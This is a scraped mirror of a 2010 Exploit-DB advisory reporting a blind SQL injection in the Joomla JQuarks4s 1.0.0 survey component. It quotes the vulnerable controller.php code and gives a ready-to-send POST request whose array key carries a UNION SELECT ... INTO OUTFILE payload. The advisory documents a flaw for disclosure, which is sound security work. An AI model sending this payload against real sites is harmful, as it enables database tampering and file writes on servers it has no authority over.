Joomla! Component JQuarks4s 1.0.0 – Blind SQL Injection

• Exploit Database
• 161 阅读

• 作者： Salvatore Fresta
  日期： 2010-11-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15466/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111

  JQuarks4s Joomla Component 1.0.0 Blind SQL Injection Vulnerability   NameJQuarks4s Vendorhttp://www.iptechinside.com/labs/projects/list_files/jquarks-for-surveys Versions Affected 1.0.0   AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2010-11-08   X. INDEX   I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX   I. ABOUT THE APPLICATION ________________________   A Joomla 1.5 free and open source tool for online surveys and statistical analysis.     II. DESCRIPTION _______________   A parameter is not properly sanitised beforebeingused in a SQL query.     III. ANALYSIS _____________   Summary:   A) Blind SQL Injection   A) Blind SQL Injection _______________________   Inputpassedtothe"q" parameterin when "option" is set to "com_jquarks4s" and "task" to "submitSurvey" is not properly verified beforebeingused in a SQL query. Thiscanbeexploited tomanipulateSQLqueriesby injecting arbitrary SQL code.   The following is the vulnerable code (controller.php):     function submitSurvey() { // get post data $data = JRequest::get('post');   ...   $questions = $data['q']; // debug //var_dump($data);exit; foreach ($questions as $question_id => $question) :   $type_id = (int)$question['type_id'];   switch ($type_id) :   ...   case 4: // recuperer les row_id du question_id $rowsDB = $sessionModel->getRows($question_id);     So,$question_idisa key of the array "q" and type_id his value. Thereforetheinjection is possibileby insertingarbitrary SQL code as the key of the array and 4 as his value.     IV. SAMPLE CODE _______________   A) Blind SQL Injection   Trytosend the following packet to yourtestserver. Ensure thatmagic_quotes_gpcisset to off in order to use the following test.     POST /path/index.php HTTP/1.1 Host: target Content-Type: application x-www-form-urlencoded Content-Length: 97   option=com_jquarks4s&task=submitSurvey&q[-1 UNION SELECT 0x414141 INTO OUTFILE '/tmp/trycopy' ]=4     Note that if you want to use the '=' character, youmust covert it in URL encode format (%3D), otherwise the value 4 needed for the injection cannot be read.     V. FIX ______   No fix.